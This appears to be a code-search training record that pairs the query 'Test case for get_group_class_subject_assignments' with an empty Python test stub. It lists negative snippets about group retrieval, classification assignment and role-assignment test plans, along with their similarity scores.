"def create_bulk_job(request: HttpRequest) -> Optional[JsonResponse]:\n dynamodb_table = dynamodb.Table(table_name)\n user_id = request.LTI[\"lis_person_sourcedid\"]\n user_full_name = request.LTI[\"lis_person_name_full\"]\n user_email = request.LTI[\"lis_person_contact_email_primary\"]\n sis_account_id = request.LTI[\"custom_canvas_account_sis_id\"]\n school_id = sis_account_id.split(\":\")[1]\n\n table_data = json.loads(request.POST['data'])\n\n term_id = request.POST['termID']\n term = Term.objects.get(term_id=term_id)\n term_name = term.display_name\n sis_term_id = term.meta_term_id()\n course_group_id = request.POST['courseGroupID']\n course_group_name = None\n department_id = request.POST['departmentID']\n department_name = None\n create_all = table_data['create_all']\n course_instance_ids = table_data['course_instance_ids']\n template_id = None if table_data['template'] == '0' else table_data['template']\n template_name = 'No template' if not template_id else get_canvas_site_template_name(template_id)\n\n if create_all:\n # Get all course instance records that will have Canvas sites created by filtering on the\n # term and (course group or department) values\n # Also filter on the 'bulk_processing' flag to avoid multiple job submission conflicts\n potential_course_sites_query = get_course_instance_query_set(\n term_id, sis_account_id\n ).filter(canvas_course_id__isnull=True,\n sync_to_canvas=0,\n bulk_processing=0).select_related('course')\n\n # Check if a course group or department filter needs to be applied to queryset\n # The value of 0 is for the default option of no selected Department/Course Group\n if school_id == 'colgsas':\n if course_group_id and course_group_id != '0':\n course_group_name = CourseGroup.objects.get(course_group_id=course_group_id).name\n potential_course_sites_query = potential_course_sites_query.filter(course__course_group=course_group_id)\n else:\n if department_id and department_id != '0':\n department_name = Department.objects.get(department_id=department_id).name\n potential_course_sites_query = potential_course_sites_query.filter(course__department=department_id)\n\n else:\n # Get all potential course instances for the selected term in the account\n # Further filter by the selected course instances from the DataTable\n potential_course_sites_query = get_course_instance_query_set(\n term_id, sis_account_id\n ).filter(canvas_course_id__isnull=True,\n sync_to_canvas=0,\n bulk_processing=0,\n course_instance_id__in=course_instance_ids).select_related('course')\n\n if potential_course_sites_query.count() > 0:\n job = JobRecord(\n user_id=user_id,\n user_full_name=user_full_name,\n user_email=user_email,\n school=school_id,\n term_id=term_id,\n sis_term_id=sis_term_id,\n term_name=term_name,\n department_id=department_id,\n department_name=department_name,\n course_group_id=course_group_id,\n course_group_name=course_group_name,\n template_id=template_id,\n template_name=template_name,\n workflow_state=\"pending\",\n )\n\n log_extra = {\n 'sis_account_id': sis_account_id,\n 'user_id': user_id,\n 'user_full_name': user_full_name,\n 'user_email': user_email,\n 'school': school_id,\n 'term_id': term_id,\n 'term_name': term_name,\n 'department_id': department_id,\n 'department_name': department_name,\n 'course_group_id': course_group_id,\n 'course_group_name': course_group_name,\n 'template_id': template_id\n }\n # Sanitized input for log statements.\n term_id = str(term_id)\n sis_account_id = str(sis_account_id)\n logger.debug(f'Generating task objects for term ID {term_id} (term name {term_name}) '\n f'and custom Canvas account sis ID {sis_account_id}.', extra=log_extra)\n\n # Create TaskRecord objects for each course instance\n tasks = generate_task_objects(potential_course_sites_query, job)\n\n # Set the bulk_processing field to true for all course instances being processed by this job so they\n # do not show up in the new job page\n potential_course_sites_query.update(bulk_processing=True)\n\n logger.debug(f'Creating bulk job for term ID {term_id} (term name {term_name}) '\n f'and custom Canvas account sis ID {sis_account_id}.', extra=log_extra)\n # Write the TaskRecords to DynamoDB. We insert these first since the subsequent JobRecord\n # kicks off the downstream bulk workflow via a DynamoDB stream.\n batch_write_item(dynamodb_table, tasks)\n\n # Now write the JobRecord to DynamoDB\n response = dynamodb_table.put_item(Item=job.to_dict())\n if response[\"ResponseMetadata\"][\"HTTPStatusCode\"] != 200:\n logger.error(f\"Error adding JobRecord to DynamoDB: {response}\")\n # TODO improve this logging statement\n\n messages.add_message(request, messages.SUCCESS, 'Bulk job created')\n else:\n messages.add_message(request, messages.WARNING, 'No potential course sites available with provided filters')\n\n logger.debug(f'Job creation process complete for term ID {term_id} (term name {term_name}) '\n f'and custom Canvas account sis ID {sis_account_id}.', extra=log_extra)\n return redirect('bulk_site_creator:index')",
"def test_create_occurrence(self):\n pass",
"def test_bulk_activity(self):\n file_path_ac = os.path.join(os.path.dirname(__file__),\n self.testdata_folder,\n self.filename_act)\n data = {\n 'bulk_upload' : open(file_path_ac, 'rb'),\n }\n\n existing_acs = Activity.objects.filter(activitygroup__keyflow=self.kic)\n existing_nace = list(existing_acs.values_list('nace', flat=True))\n\n encoding = 'cp1252'\n df_file_ags = pd.read_csv(file_path_ac, sep='\\t', encoding=encoding)\n df_file_ags = df_file_ags.rename(\n columns={c: c.lower() for c in df_file_ags.columns})\n file_nace = df_file_ags['nace']\n new_nace = [c for c in file_nace if str(c) not in existing_nace]\n\n res = self.client.post(self.ac_url, data)\n assert res.status_code == status.HTTP_201_CREATED\n res_json = res.json()\n assert res_json['count'] == len(file_nace)\n assert len(res_json['created']) == len(new_nace)\n\n # assert that the number of activities matches\n all_ac = Activity.objects.filter(activitygroup__keyflow=self.kic)\n assert len(all_ac) == len(existing_nace) + len(new_nace)\n\n # assert that the Name matches in all values\n for row in df_file_ags.itertuples(index=False):\n # ToDo: different test case if activitygroups don't exist\n ag = ActivityGroup.objects.get(code=row.ag)\n ac = Activity.objects.get(activitygroup=ag,\n nace=row.nace)\n assert ac.name == row.name",
"def test_create(self):\n pass",
"def test_instantiating_salesforce_bulk_job_validates_operation(salesforce_session, bulk_request):\n with pytest.raises(AssertionError):\n SalesforceBulkJob('floob', 'Lead')",
"def test_get_recipe_information_bulk(self):\n pass",
"def test_website_companies_create(self):\n pass",
"def test_create_instructor_complete_data(self):\n response = self.client.post(self.url, data=json.dumps(self.payload_all), content_type='application/json')\n self.assertEqual(response.status_code, status.HTTP_200_OK, msg=response.content.decode())\n self.assertEqual(Instructor.objects.count(), self.qty + 1)\n self.assertTrue(User.objects.filter(email=self.payload_all['email']).exists())\n self.assertTrue(User.objects.filter(username=self.payload_all['email']).exists())\n user_id = User.objects.get(username=self.payload_all['email']).id\n self.assertTrue(Instructor.objects.filter(user_id=user_id).exists())",
"def test_create_manual_account02(self, client):\n user = UserFactory.get_user()\n institution = InstitutionFactory.get_manual_institution()\n account = Account.objects.create_manual_account(\n user.id, institution.id, '1111111', '')\n assert isinstance(account, Account)\n assert account.type_ds == Account.DEBT\n\n account = Account.objects.create_manual_account(\n user.id, institution.id, '2222222', 'some')\n assert Item.objects.count() == 1",
"def bulk_create(cls, cb, approvals):\n url = cls.urlobject.format(cb.credentials.org_key) + \"/_bulk\"\n resp = cb.post_object(url, body=approvals)\n result = resp.json()\n item_list = result.get(\"results\", [])\n return [cls(cb, item[\"id\"], item) for item in item_list]",
"def test_create_Student(self):\n school_ids = self.create_School(1,20)\n url = '/students'\n data = {'first_name': 'Poompatai', 'last_name': 'Puntitpong','age': 20, 'nationality': 'Thailand', 'school': school_ids[0]}\n response = self.client.post(url, data, format='json')\n self.assertEqual(response.status_code, status.HTTP_201_CREATED)\n self.assertEqual(Student.objects.count(), 1)\n self.assertEqual(Student.objects.get().first_name, 'Poompatai')\n self.assertEqual(Student.objects.get().last_name, 'Puntitpong')\n self.assertEqual(Student.objects.get().age, 20)\n self.assertEqual(Student.objects.get().nationality, 'Thailand')\n self.assertEqual(Student.objects.get().school.id, school_ids[0])\n\n \"\"\"Invalid School\"\"\"\n data = {'first_name': 'Poompatai', 'last_name': 'Puntitpong','age': 20, 'nationality': 'Thailand', 'school': 'aaaa'}\n response = self.client.post(url, data, format='json')\n self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)",
"def test_create_Student_data_type(self):\n school_ids = self.create_School(1,20)\n url = '/students'\n \"\"\"String age\"\"\"\n data = {'first_name': 'Poompatai', 'last_name': 'Puntitpong','age': '20', 'nationality': 'Thailand', 'school': school_ids[0]}\n response = self.client.post(url, data, format='json')\n self.assertEqual(response.status_code, status.HTTP_201_CREATED)\n self.assertEqual(Student.objects.count(), 1)\n self.assertEqual(Student.objects.get().first_name, 'Poompatai')\n self.assertEqual(Student.objects.get().last_name, 'Puntitpong')\n self.assertEqual(Student.objects.get().age, 20)\n self.assertEqual(Student.objects.get().nationality, 'Thailand')\n self.assertEqual(Student.objects.get().school.id, school_ids[0])\n\n \"\"\"Name, nationality, type number\"\"\"\n data = {'first_name':123, 'last_name': 123,'age': 20, 'nationality': 123, 'school': school_ids[0]}\n response = self.client.post(url, data, format='json')\n self.assertEqual(response.status_code, status.HTTP_201_CREATED)\n\n \"\"\"String age but non convertable\"\"\"\n data = {'first_name': 'Poompatai', 'last_name': 'Puntitpong','age': 'AAA', 'nationality': 'Thailand', 'school': school_ids[0]}\n response = self.client.post(url, data, format='json')\n self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)",
"def test_create_campaign(self):\n acc1 = Account.objects.create(name='acc1', code='111-111')\n row = {'PROJ_NAME1': 'China Fund', 'PROJ_NO': 'CFD-111',\n 'LOCATION': 'CHINA', 'SUMMARY': 'Ssssss'}\n sync.create_campaign(acc1, row, 'China Fund', Account.COUNTRY)\n campaign = Campaign.objects.filter(name='China Fund').first()\n self.assertEqual(self.china.pk, campaign.country.pk)\n\n acc2 = Account.objects.create(name='acc2', code='222-222')\n row = {'PROJ_NAME1': 'Smith Memorial Fund', 'PROJ_NO': 'SPF-222',\n 'SUMMARY': 'Ssssss'}\n sync.create_campaign(acc2, row, 'Smith Memorial Fund',\n Account.MEMORIAL)\n campaign = Campaign.objects.filter(name='Smith Memorial Fund').first()\n self.assertEqual(None, campaign.country)\n self.assertEqual(\n {\"data\": [{\"type\": \"text\", \"data\": {\"text\": \"Ssssss\"}}]},\n json.loads(campaign.description))\n acc1.delete()\n acc2.delete()",
"def test_create_student_complete_data(self):\n response = self.client.post(self.url, data=json.dumps(self.payload_all), content_type='application/json')\n self.assertEqual(response.status_code, status.HTTP_200_OK, msg=response.content.decode())\n self.assertEqual(Student.objects.count(), self.qty + 1)\n self.assertTrue(User.objects.filter(email=self.payload_all['email']).exists())\n self.assertTrue(User.objects.filter(username=self.payload_all['email']).exists())\n user_id = User.objects.get(username=self.payload_all['email']).id\n self.assertTrue(Student.objects.filter(user_id=user_id).exists())",
"def test_instantiating_salesforce_bulk_job_validates_object(salesforce_session, bulk_request):\n with pytest.raises(AssertionError):\n SalesforceBulkJob('update', 'lead')\n with pytest.raises(AssertionError):\n SalesforceBulkJob('update', 'Floob')",
"def test_persons_import(self):\n with mock.patch.multiple(\n PersonClient,\n _post=self._mock_post\n ):\n audit = factories.AuditFactory()\n\n slug = \"AssessmentTemplate1\"\n response = self.import_data(OrderedDict([\n (\"object_type\", \"Assessment_Template\"),\n (\"Code*\", slug),\n (\"Audit*\", audit.slug),\n (\"Default Assignee\", \"[email protected]\"),\n (\"Default Verifier\", \"[email protected]\\[email protected]\"),\n (\"Title\", \"Title\"),\n (\"Object Under Assessment\", 'Control'),\n ]))\n self._check_csv_response(response, {})\n assessment_template = AssessmentTemplate.query.filter(\n AssessmentTemplate.slug == slug).first()\n\n self.assertEqual(len(assessment_template.default_people['verifiers']), 2)\n self.assertEqual(len(assessment_template.default_people['assessors']), 1)",
"def test_create(self):\n for citizen in self.citizen_datas:\n # Request the citizen creation.\n body = dict(zip(self.citizen_fields, citizen))\n\n resp = self.client.post(self.url, data=json.dumps(body), content_type='application/json')\n\n # Ensure estatus 201\n assert resp.status_code == HTTPStatus.CREATED, \\\n '{url}: Got {error}, Expected {code}'. \\\n format(url=self.url, error=resp.status_code, code=HTTPStatus.CREATED.value)\n\n resp_body = resp.json()\n # Ensure data created is correct.\n for key in body:\n assert resp_body[key] == body[key], \\\n '{url}: Got field {field} -> {error}, Expected {code}'. \\\n format(url=self.url, field = key, error=resp_body[key], code=body[key])",
"def test_bulk_flow(self):\n lengths = []\n before = Actor2Actor.objects.count()\n for i in range(2):\n file_path = os.path.join(os.path.dirname(__file__),\n self.testdata_folder,\n self.filename_a2a)\n data = {\n 'bulk_upload' : open(file_path, 'rb'),\n }\n\n res = self.client.post(self.a2a_url, data)\n assert res.status_code == status.HTTP_201_CREATED\n lengths.append(Actor2Actor.objects.count())\n # check that 2nd loop does not create additional products\n # but updates them\n assert lengths[0] == lengths[1]\n new = lengths[0] - before\n # check if new fraction-flow per material per new flow was created\n assert FractionFlow.objects.count() == \\\n new * self.composition.fractions.count()\n file_path = os.path.join(os.path.dirname(__file__),\n self.testdata_folder,\n self.filename_a2a_error)\n data = {\n 'bulk_upload' : open(file_path, 'rb'),\n }\n\n res = self.client.post(self.a2a_url, data)\n assert res.status_code == status.HTTP_400_BAD_REQUEST\n\n file_path = os.path.join(os.path.dirname(__file__),\n self.testdata_folder,\n self.filename_a2a_self_ref)\n data = {\n 'bulk_upload' : open(file_path, 'rb'),\n }\n\n res = self.client.post(self.a2a_url, data)\n assert res.status_code == status.HTTP_400_BAD_REQUEST",
"def test_post(self):\n user = self.make_user()\n school_year = SchoolYearFactory(school__admin=user)\n\n with self.login(user):\n response = self.post(\"reports:bundle\", school_year.pk)\n\n self.response_302(response)\n assert school_year.bundle_set.count() == 1",
"def setUpTestData(cls):\n number_of_authors = 13\n\n for author_id in range(number_of_authors):\n Author.objects.create(\n first_name=f'Christian {author_id}',\n last_name=f'Surname {author_id}',\n )",
"def test_create_record(self):\n pass"
] |
[
"0.68857133",
"0.67814386",
"0.66630286",
"0.6434951",
"0.6303845",
"0.6181681",
"0.6117092",
"0.6060836",
"0.60593385",
"0.6038709",
"0.60217255",
"0.6008689",
"0.5981003",
"0.5978704",
"0.59675664",
"0.59448993",
"0.59369195",
"0.59315854",
"0.5929955",
"0.59234595",
"0.58894205",
"0.58750355",
"0.58731437",
"0.5854188",
"0.5854128",
"0.5834831",
"0.58197767",
"0.5819044",
"0.58148086",
"0.57970804"
] |
0.95521
|
0
|
Test case for delete7
|
def test_delete7(self):
pass
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def test_delete1(self):\n pass",
"def test_delete_run(self):\n pass",
"def delete():",
"def test_delete(self):\n pass",
"def test_delete_case(self):\n pass",
"def test_delete_occurrence(self):\n pass",
"def test_delete_item_using_delete(self):\n pass",
"def test_delete_record(self):\n pass",
"def delete(self, *args, **kwargs):\n return 0",
"def test_delete_records(self):\n pass",
"def do_delete(self, arg):\n \treturn False",
"def delete(self):\n ...",
"def test_remove(self):\n pass",
"def test_delitem(self):\n with self.assertRaises(QiitaDBNotImplementedError):\n del self.tester['1.SKM7.640188']",
"def test_delete(self):\r\n course = CourseFactory.create(org='edX', course='999')\r\n with self.assertRaises(ValueError):\r\n tabs.primitive_delete(course, 0)\r\n with self.assertRaises(ValueError):\r\n tabs.primitive_delete(course, 1)\r\n with self.assertRaises(IndexError):\r\n tabs.primitive_delete(course, 6)\r\n tabs.primitive_delete(course, 2)\r\n self.assertFalse({u'type': u'textbooks'} in course.tabs)\r\n # Check that discussion has shifted up\r\n self.assertEquals(course.tabs[2], {'type': 'discussion', 'name': 'Discussion'})",
"def test_delete_complex_tree_08(comp):\n comp.delete(11)\n assert tuple(comp.in_order()) == (4, 6, 7, 8, 9, 10, 12, 13, 14, 15)\n assert tuple(comp.breadth_first()) == (12, 8, 14, 6, 10, 13, 15, 4, 7, 9)",
"def test_delete_complex_tree_07(comp):\n comp.delete(12)\n assert tuple(comp.in_order()) == (4, 6, 7, 8, 9, 10, 11, 13, 14, 15)\n assert tuple(comp.breadth_first()) == (11, 8, 14, 6, 10, 13, 15, 4, 7, 9)",
"def test_delete_complex_tree_06(comp):\n comp.delete(9)\n assert tuple(comp.in_order()) == (4, 6, 7, 8, 10, 11, 12, 13, 14, 15)\n assert tuple(comp.breadth_first()) == (11, 8, 13, 6, 10, 12, 14, 4, 7, 15)",
"def test_delete_complex_tree_05(comp):\n comp.delete(8)\n assert tuple(comp.in_order()) == (4, 6, 7, 9, 10, 11, 12, 13, 14, 15)\n assert tuple(comp.breadth_first()) == (11, 9, 13, 6, 10, 12, 14, 4, 7, 15)",
"def test_007_delete(self):\n HEADING()\n db = self.db\n\n db.connect()\n print (\"AAA\")\n before_count = len(db)\n print (\"CCC\", len(db))\n job = db.insert(\"deleteme\")\n print (\"DDD\", len(db))\n\n job = db.delete_jobs(\"job_name\", \"deleteme\")\n print (\"EEE\")\n after_count = len(db)\n print (\"FFF\", len(db))\n assert(before_count - after_count == 0)",
"def test_delete_goal(self):\n pass",
"def test_delete_complex_tree_04(comp):\n comp.delete(13)\n assert tuple(comp.in_order()) == (4, 6, 7, 8, 9, 10, 11, 12, 14, 15)\n assert tuple(comp.breadth_first()) == (11, 8, 14, 6, 10, 12, 15, 4, 7, 9)",
"def test_delete(self):\n # login as library manager\n self.authenticate(self.user)\n\n # check there are 3 works\n self.assertEqual(Work.objects.count(), 3)\n\n self.assertNotEqual(self.work1.song_set.count(), 0)\n\n # prune works\n response = self.client.delete(self.url)\n\n # check http status\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n\n # check the response\n self.assertDictEqual(response.data, {\"deleted_count\": 2})\n\n # check there are only 1 work remaining\n self.assertEqual(Work.objects.count(), 1)\n\n # check artists with songs remains\n self.assertEqual(Work.objects.filter(pk=self.work2.pk).count(), 0)\n self.assertEqual(Work.objects.filter(pk=self.work3.pk).count(), 0)",
"def test_do_delete(test_dao):\r\n DUT = dtmFunction(test_dao, test=True)\r\n DUT.do_select_all(revision_id=1)\r\n DUT.do_insert(revision_id=1, parent_id=1)\r\n\r\n _error_code, _msg = DUT.do_delete(DUT.last_id)\r\n\r\n assert _error_code == 0\r\n assert _msg == (\"RAMSTK SUCCESS: Deleting an item from the RAMSTK Program \"\r\n \"database.\")",
"def test_delete(self):\n SampleTemplate.create(self.metadata, self.new_study)\n SampleTemplate.delete(2)\n obs = self.conn_handler.execute_fetchall(\n \"SELECT * FROM qiita.required_sample_info WHERE study_id=2\")\n exp = []\n self.assertEqual(obs, exp)\n obs = self.conn_handler.execute_fetchall(\n \"SELECT * FROM qiita.study_sample_columns WHERE study_id=2\")\n exp = []\n self.assertEqual(obs, exp)\n with self.assertRaises(QiitaDBExecutionError):\n self.conn_handler.execute_fetchall(\n \"SELECT * FROM qiita.sample_2\")",
"def test_delete_edge_case_with_write_concern_0_return_None(self):\n p1 = self.Person(name=\"User Z\", age=20).save()\n del_result = p1.delete(w=0)\n assert del_result is None",
"def test_deleting_a_segment(self):\n pass",
"def test_delete_note(self):\n pass",
"def test_delete_complex_tree_03(comp):\n comp.delete(15)\n assert tuple(comp.in_order()) == (4, 6, 7, 8, 9, 10, 11, 12, 13, 14)\n assert tuple(comp.breadth_first()) == (11, 8, 13, 6, 10, 12, 14, 4, 7, 9)",
"def test_delete_complex_tree_02(comp):\n comp.delete(4)\n assert tuple(comp.in_order()) == (6, 7, 8, 9, 10, 11, 12, 13, 14, 15)\n assert tuple(comp.breadth_first()) == (11, 8, 13, 6, 10, 12, 14, 7, 9, 15)"
] |
[
"0.7936488",
"0.783981",
"0.7695349",
"0.76563674",
"0.7418453",
"0.7413371",
"0.7213009",
"0.7137496",
"0.7116104",
"0.7084131",
"0.70804936",
"0.707765",
"0.70765734",
"0.7072393",
"0.69517624",
"0.69384027",
"0.6938276",
"0.6938002",
"0.6929521",
"0.6919627",
"0.69065815",
"0.6898886",
"0.68551046",
"0.6841108",
"0.68368375",
"0.68355817",
"0.68346643",
"0.68253475",
"0.68188405",
"0.68054867"
] |
0.8929304
|
0
|
Test case for get_details7
|
def test_get_details7(self):
pass
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def get_details(self):",
"def test_data_object_get_details(self):\n pass",
"def test_get_details(self):\n restaurant_id = 23917\n with self.app.app_context():\n details = ordrin.get_details(restaurant_id)\n\n self.assertEquals(details['name'], 'Test Merchant 20130315',\n 'Check restaurant name on test details.')\n self.assertEquals(details['id'], restaurant_id,\n 'Check restaurant id on test details.')\n self.assertTrue(details['delivers'], 'Check delivery flag on test entry.')\n self.assertTrue(details['allows_asap'],\n 'Check asap flag on test details.')\n self.assertAlmostEqual(details['location'][0], 42.825685,\n 'Check latitude on test details.')\n self.assertAlmostEqual(details['location'][1], -73.879458,\n 'Check longitude on test details.')\n self.assertEquals(details['partner'], 'delivery.com',\n 'Check delivery partner on test details.')\n self.assertEquals(details['address'], '123 FAKE ST',\n 'Check address on test details.')\n self.assertTrue(False)",
"def test_get_pay_in_details(self):\n pass",
"def test_get_item_details(self, mock_requests_get):\n details = resources.get_item_details(21787)\n\n item = details.item\n assert item.id == 21787\n assert item.name == \"Steadfast boots\"\n assert item.type == \"Miscellaneous\"\n assert item.current.price == 5900000\n assert item.today.price == -138200\n assert item.members is True",
"def test_display_details(self):\n self.new_details.save_details()\n twitter = Details('Dennis', 'Facebook', 'Kiplangat', 'kiplangat18')\n twitter.save_details()\n gmail = Details('Amos', 'Gmail', 'amos', 'kiplangat18')\n gmail.save_details()\n self.assertEqual(len(Details.display_details(twitter.user_name)), 2)",
"def get_details(self):\n raise Exception(\"bad details\")",
"def test_get_transaction_details_request(self):\n self.trans_details.get_transaction_details(\n trans_id = 123456,\n )",
"def test_get_info(self):\n pass",
"def test_detail_format(self) -> None:\n r = self.perform_request('detail', True)\n self.assert_json_schema(r.json(), self.get_details_schema())",
"def test_detail(self):\n response = self.client.get('/exercises/{}/'.format(self.exer1.id))\n expected = {\n 'id': self.exer1.id,\n 'name': self.exer1.name,\n 'description': self.exer1.description,\n 'muscle_group': self.exer1.muscle_group\n }\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n self.assertEqual(response.data, expected)",
"def test_detail(self):\n response = self.client.get('/routines/{}/'.format(self.rout1.id))\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n self.assertEqual(response.data['id'], self.rout1.id)",
"def test_get_details(self):\n\t\tactual_details = self.watcher.analyze(layers=[self.second_layer])\n\t\texpected_details = self.watcher.get_details()\n\t\t\n\t\tself.assertEqual(len(actual_details), len(expected_details), \"actual and expected details differ\")",
"def get_details(self):\n return self.details",
"def get_details(self):\n return self.details",
"def get_details(self):\n return self.details",
"def test_detail(self):\n response = Tmdb.detail(69740)\n self.assertTrue(int(response.status_code) == 200)\n data = response.json()\n self.assertTrue(data['id'])\n self.assertTrue(data['name'])\n # TODO check if all the shows are in the good format (can be from_dict/to_dict)",
"def test_get_rule_details(self):\n pass",
"def test_get_record(self):\n pass",
"def test_get_recipe_information(self):\n pass",
"def test_details(self, mock_product, mock_nutrival):\n mock_product.return_value = MagicMock(\n side_effect=Products.objects.filter()\n )\n mock_product.return_value.first.return_value = Products(rating=\"a\")\n mock_nutrival.return_value = MagicMock(\n side_effect=Products.objects.filter()\n )\n mock_nutrival.return_value.first.return_value = NutritionalValues()\n response = self.client.get(\"/details/1/\")\n self.assertEqual(response.status_code, 200)\n self.assertTemplateUsed(response, \"search/base.html\")\n self.assertTemplateUsed(response, \"search/search_form.html\")\n self.assertTemplateUsed(response, \"search/details.html\")\n self.assertIsInstance(response.context[\"product\"], Products)\n self.assertIsInstance(response.context[\"nutrival\"], NutritionalValues)\n self.assertIn(\"nutriscore-a\", response.context[\"nutriscore\"])",
"def test_detail(self):\n # Test detail URL using ad_guid.\n url = '/api/users/{}/'.format(self.user1.ad_guid)\n response = self.client.get(url)\n self.assertEqual(response.status_code, 200)\n # Test URL using email also.\n url = '/api/users/{}/'.format(self.user1.email.lower())\n response = self.client.get(url)\n self.assertEqual(response.status_code, 200)",
"def test_website_companies_get_details(self):\n pass",
"def test_get1(self):\n pass",
"def test_detail(client, auth):\n response = client.get(\"/100/detail\")\n assert response.status_code == 404\n\n response = client.get(\"/1/detail\")\n assert response.status_code == 200\n assert b\"test title\" in response.data\n assert b\"by test on 2018-01-01\" in response.data\n assert b\"test\\nbody\" in response.data\n assert b'href=\"/1/update\"' not in response.data\n\n auth.login()\n response = client.get(\"/1/detail\")\n assert b'href=\"/1/update\"' in response.data",
"def test_retrive_recipe_detail(self):\n recipe = create_sample_recipe(user=self.sample_user)\n recipe.tag.add(create_sample_tag(user=self.sample_user))\n recipe.ingredient.add(create_sample_ingredient(user=self.sample_user))\n\n detail_URL = get_detail_URL(recipe.id)\n res = self.client.get(detail_URL)\n\n serializer = RecipeDetailSerializer(recipe)\n\n self.assertEqual(res.data, serializer.data)",
"def hit_details(hit_id, sandbox, recruiter):\n prolific_check(recruiter, sandbox)\n rec = by_name(recruiter, skip_config_validation=True)\n details = rec.hit_details(hit_id, sandbox)\n print(json.dumps(details, indent=4, default=str))",
"def test_details_id_ok(self):\n self.check_response('/attributes/1',\n ('Attribute ID#1 not found',))",
"def test_get_records(self):\n pass",
"def test_get_activity_occurrence_details(self):\n pass"
] |
[
"0.8004347",
"0.79477316",
"0.76338315",
"0.7213044",
"0.7199065",
"0.71456754",
"0.7099346",
"0.70801014",
"0.7073461",
"0.69762564",
"0.68881756",
"0.67643636",
"0.66935813",
"0.66855335",
"0.66855335",
"0.66855335",
"0.66723365",
"0.655939",
"0.6510815",
"0.6490076",
"0.64320815",
"0.6377312",
"0.6343314",
"0.63171315",
"0.6316394",
"0.63138294",
"0.6293315",
"0.6286553",
"0.62431365",
"0.62229824"
] |
0.8986665
|
0
|
Test case for get_group_class_subject_assignments
|
def test_get_group_class_subject_assignments(self):
pass
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def get_assignments(self) -> List :\n return self.assignments",
"def test_groups_get(self):\n pass",
"def test_groups_get(self):\n pass",
"def test_get_groups(self):\n pass",
"def test_get_groups(self):\n pass",
"def testAssignClassifications(self):\n classifications = [c.UID for c in self.directory.getClassifications()]\n self.person.setClassifications(classifications)\n for c in self.person.getClassifications():\n self.failUnless(c.id in ['faculty', 'staff', 'grad-students'])\n self.failUnlessEqual(c.Type(), 'Classification')",
"def test_list_role_assignment_using_sourced_groups(self):\n test_plan = {\n # The default domain with 3 users, 3 groups, 3 projects,\n # plus 3 roles.\n 'entities': {'domains': {'id': CONF.identity.default_domain_id,\n 'users': 3, 'groups': 3, 'projects': 3},\n 'roles': 3},\n # Users 0 & 1 are in the group 0, User 0 also in group 1\n 'group_memberships': [{'group': 0, 'users': [0, 1]},\n {'group': 1, 'users': [0]}],\n # Spread the assignments around - we want to be able to show that\n # if sourced by group, assignments from other sources are excluded\n 'assignments': [{'user': 0, 'role': 0, 'project': 0},\n {'group': 0, 'role': 1, 'project': 1},\n {'group': 1, 'role': 2, 'project': 0},\n {'group': 1, 'role': 2, 'project': 1},\n {'user': 2, 'role': 1, 'project': 1},\n {'group': 2, 'role': 2, 'project': 2}\n ],\n 'tests': [\n # List all effective assignments sourced from groups 0 and 1\n {'params': {'source_from_group_ids': [0, 1],\n 'effective': True},\n 'results': [{'group': 0, 'role': 1, 'project': 1},\n {'group': 1, 'role': 2, 'project': 0},\n {'group': 1, 'role': 2, 'project': 1}\n ]},\n # Adding a role a filter should further restrict the entries\n {'params': {'source_from_group_ids': [0, 1], 'role': 2,\n 'effective': True},\n 'results': [{'group': 1, 'role': 2, 'project': 0},\n {'group': 1, 'role': 2, 'project': 1}\n ]},\n ]\n }\n self.execute_assignment_plan(test_plan)",
"def execute_assignment_cases(self, test_plan, test_data):\n def check_results(expected, actual, param_arg_count):\n if param_arg_count == 0:\n # It was an unfiltered call, so default fixture assignments\n # might be polluting our answer - so we take into account\n # how many assignments there were before the test.\n self.assertEqual(\n len(expected) + test_data['initial_assignment_count'],\n len(actual))\n else:\n self.assertThat(actual, matchers.HasLength(len(expected)))\n\n for each_expected in expected:\n expected_assignment = {}\n for param in each_expected:\n if param == 'inherited_to_projects':\n expected_assignment[param] = each_expected[param]\n elif param == 'indirect':\n # We're expecting the result to contain an indirect\n # dict with the details how the role came to be placed\n # on this entity - so convert the key/value pairs of\n # that dict into real entity references.\n indirect_term = {}\n for indirect_param in each_expected[param]:\n key, value = self._convert_entity_shorthand(\n indirect_param, each_expected[param],\n test_data)\n indirect_term[key] = value\n expected_assignment[param] = indirect_term\n else:\n # Convert a simple shorthand entry into a full\n # entity reference\n key, value = self._convert_entity_shorthand(\n param, each_expected, test_data)\n expected_assignment[key] = value\n self.assertIn(expected_assignment, actual)\n\n def convert_group_ids_sourced_from_list(index_list, reference_data):\n value_list = []\n for group_index in index_list:\n value_list.append(\n reference_data['groups'][group_index]['id'])\n return value_list\n\n # Go through each test in the array, processing the input params, which\n # we build into an args dict, and then call list_role_assignments. Then\n # check the results against those specified in the test plan.\n for test in test_plan.get('tests', []):\n args = {}\n for param in test['params']:\n if param in ['effective', 'inherited', 'include_subtree']:\n # Just pass the value into the args\n args[param] = test['params'][param]\n elif param == 'source_from_group_ids':\n # Convert the list of indexes into a list of IDs\n args[param] = convert_group_ids_sourced_from_list(\n test['params']['source_from_group_ids'], test_data)\n else:\n # Turn 'entity : 0' into 'entity_id = ac6736ba873d'\n # where entity in user, group, project or domain\n key, value = self._convert_entity_shorthand(\n param, test['params'], test_data)\n args[key] = value\n results = self.assignment_api.list_role_assignments(**args)\n check_results(test['results'], results, len(args))",
